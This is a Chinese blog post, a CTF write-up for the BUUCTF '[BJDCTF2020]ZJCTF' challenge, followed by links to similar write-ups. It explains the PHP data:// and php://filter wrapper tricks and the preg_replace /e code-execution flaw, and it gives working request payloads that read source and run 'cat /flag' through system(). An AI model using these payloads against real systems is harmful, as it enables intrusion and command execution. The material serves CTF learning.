[BJDCTF2020]ZJCTF,不过如此

最新推荐文章于 2024-06-17 22:56:29 发布
最新推荐文章于 2024-06-17 22:56:29 发布
阅读量153 收藏
点赞数
分类专栏: buu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/missht0/article/details/113146496
版权

[BJDCTF2020]ZJCTF,不过如此

<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream"))//text的内容是……,这里用data伪协议写入
{
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){//file里没有flag
        die("Not now!");
    }

    include($file);  //next.php//告诉我们在next.php里面,用filter伪协议打开
    
}
else{
    highlight_file(__FILE__);
}
?>

?text=data://text/plain,I have a dream&file=php://filter/read/convert.base64-encode/resource=next.php

在这里插入图片描述
base64解码

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(    // preg_replace /e漏洞
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";//调用complex函数
}

function getFlag(){
	@eval($_GET['cmd']);//目标当然是调用getFlag函数
}
知识点:preg_replace /e漏洞
  1. 在preg_replace($pattern, $replacement, $subject)函数中,
    p a t t e r n 以 / e 结 尾 时 pattern以/e结尾时 pattern/ereplacement的值会被作为php函数执行。
    也就是相当于eval($replacement)
  2. PHP中双引号包裹的字符串中可以解析变量,而单引号则不行。而这里所说的解析变量,包括了执行函数。打个比方:
    $b=”${phpinfo()}”;,就相当于执行phpinfo(),
    而这次我们要执行的函数就是getFlag(),即为"${getFlag()}"
  3. 那么其中的//1是什么意思呢?这里再穿插一个知识点:
    正则表达式中,两个圆括号的特性,将两个圆括号内表达式的相关匹配(匹配的字符串)存储到临时缓冲区,可使用\n调用(n<100)
    在题中,//转义为/,所以//1就是/1,即调用正则表达式中第一个圆括号中相关匹配,简单来说,即函数名要为第一个正则匹配 .
    因此,我们的目标就转变为了正则表达式匹配到”${getFlag()}”字符串

所以我们期待的payload应该是

?.*=${getflag()}&cmd=system('cat /flag');

但是 .在url里面会被修改为_

知识点:完全通配

[\s\S]*是完全通配的意思;

  1. [\s]—表示,只要出现空白就匹配;
  2. [\S]—表示,非空白就匹配;
    所以我们\S来代替.
next.php?\S*=${getFlag()}&cmd=system('cat /fl\ag');

(因为是审计next.php的代码,所以跟在next.php后面)

参考:http://www.shijinguowang.com/index.php/2020/09/26/bjdctf2020zjctf%EF%BC%8C%E4%B8%8D%E8%BF%87%E5%A6%82%E6%AD%A4/

切谁怕谁
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BJDCTF2020]ZJCTF不过如此 -wp
freerats的博客
08-02 476
打开容器,进行代码审计 传入text和file参数,第一个可以用data伪协议绕过,然后接下来是一个文件包含,可以用php协议读取数据。 无法直接打开提示的next.php,所以用php协议读一下。 ?text=data://text/plain,I%20have%20a%20dream&file=php://filter/read=convert.base64-encode/resource=next.php 读出的源码如下 <?php $id = $_GET['id']; $_SESS.
[BJDCTF2020]ZJCTF不过如此(特详解)
热门推荐
qq_74806534的博客
01-24 1万+
而这段代码里面的第一个子匹配项就是${phpinfo()}。编码设定,这是一个可选项,base64 编码中仅包含 0-9,a-z,A-Z,+,/,=,其中 = 是用来编码补白的。我们先看第二个参数中的\1 ,\1实际上就是 \1,而 \1 在正则表达式中有自己的含义,最后一部分为这个 Data URI 承载的内容,它可以是纯文本编写的内容,也可以是经过 base64编码 的内容。单引号中的变量不会被处理。这里我们发现了.变成了_,这是因为php会将传入的非法的参数名转成下滑线,所以我们的正则匹配才会失效。
[BJDCTF2020]ZJCTF不过如此1
最新发布
m0_73673698的博客
06-17 993
简单分析一下这段代码,代码通过GET方法来传入text和file两个参数,并且传入的text参数通过file_get_contents函数以只读的方式打开,而且当它强等于"I have a dream"这个字符串是,才能够去输出并且去执行下面的那个if判断。也就是这段代码会遍历传入的GET参数,将GET传入的变量名给了$re,把变量名的值给了$str,那么这样在传入paylaod的时候preg_replace会变成。我们将返回的base64解码就是next.php的源码了,源码如下。
buuctf-[BJDCTF2020]ZJCTF不过如此
qq_42728977的博客
12-26 2273
[BJDCTF2020]ZJCTF不过如此考点复现参考 考点 preg_replace /e 参数执行漏洞、php伪协议、转义绕过 复现 点开链接 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1&g
[BJDCTF 2020]ZJCTF不过如此
m0_70819573的博客
03-25 134
e模式下的preg_replace可以让第二个参数'替换字符串'当作代码执行,但是这里第二个参数是不可变的,但因为有这种特殊的情况,正则表达式模式或部分模式两边添加圆括号会将相关匹配存储到一个临时缓存区,并且从1开始排序,而strtolower("\1")正好表达的就是匹配区的第一个,从而我们如果匹配可以,则可以将函数实现。运用data伪协议写入数据,filter伪协议读取next.php源码内容。可值一提的是,在本地环境复现时,因为高版本的php已经废弃了改正则模式。是正则模式/ei的漏洞,
BUUCTF [BJDCTF2020]ZJCTF不过如此(正则e模式漏洞)
qq_54929891的博客
03-06 2687
进去就是一串PHP代码,代码功能是:用GET方法传入text和file两个参数的值 (file_get_contents函数代表将名字为text的文件以只读的方式打开,并且将文件内容读入到一个字符串中),如果读入的内容是I have a dream,则会输出该字符串内容并且正则表达式来匹配file参数传入的值,若匹配失败则直接GG 这个时候我们要用到伪协议data了,它可以传递文件内容也可以执行函数(函数一般要base64),这里我们传递文件内容就行了text=data://text/plain...
[BJDCTF2020]ZJCTF不过如此 简单思路及做法
EC_Carrot的博客
12-07 855
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 稍微审计,发现需要读到文件内容为I have a dream,自然而然的就可以想到用伪协议来做题! 注释里提醒了next.php,我们同样用伪协议base64加密来读文件 data://text/plain, php://input 读到的内容解码出来 <?php $id = $_GET['id']; $_SESSION['id'] =
【BUUCTF】[BJDCTF2020]ZJCTF不过如此
aoao331198的博客
04-14 1222
看看源码 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; if(preg
BUUCTF [web专项39][BJDCTF2020]ZJCTF不过如此
yanglinchiji的博客
11-20 246
这里的 `$pattern` 是一个正则表达式字符串,用于指定搜索的模式, `$replacement` 是替换成的字符串, `$subject` 是要搜索和替换的原始字符串或字符串数组。在 PHP 中,`preg_replace` 是一个强大的正则表达式替换函数。它可以在一个字符串中使用正则表达式搜索和替换指定的文本。`preg_replace` 函数返回一个替换后的字符串或数组。作为正则表达式匹配条件的参数名 且 这个参数值为的"getFlag();( 开始定义一个捕获分组,并匹配其中的子表达式;
[bjdctf2020]zjctf不过如此
m0_62593857的博客
08-16 222
preg_replace函数中,用strtolower("\\1")替换正则表达式匹配到的字符串,正则表达式跟$re有关,而$re又是通过GET方法传的参数名称,所以可控,要匹配的$str则是参数值,所以也可控,“\\1”其实就是\1,意思是第一个子匹配项,使用/e修饰符,preg_replace会将 replacement 参数当作 PHP 代码执行。
BUUCTF 个人做题记录【6-18】
qq_61620566的博客
06-18 284
做题就是学习,有写得不好的地方还请大佬们指正
BUUCTF-web类-[BJDCTF2020]ZJCTF不过如此
weixin_44622228的博客
04-20 1935
BUUCTF-web类-[BJDCTF2020]ZJCTF不过如此 分析代码,ge传入两个参数text和file,text参数利用file_get_contents()函数只读形式打开,打开后内容要与"I have a dream"字符串相匹配,才能执行下面的文件包含$file参数。 看到用的是file_get_contents()函数打开text参数,以及后面的文件包含函数,自然的想到php伪...
ctf php正则截断,记[BJDCTF2020]ZJCTF不过如此 关于php的正则匹配问题
weixin_42099942的博客
03-17 531
题目一上来就直接放出一段代码,那么话不多说,直接进行代码设计。error_reporting(0);$text = $_GET["text"];$file = $_GET["file"];if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){echo "".file_get_contents($tex...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值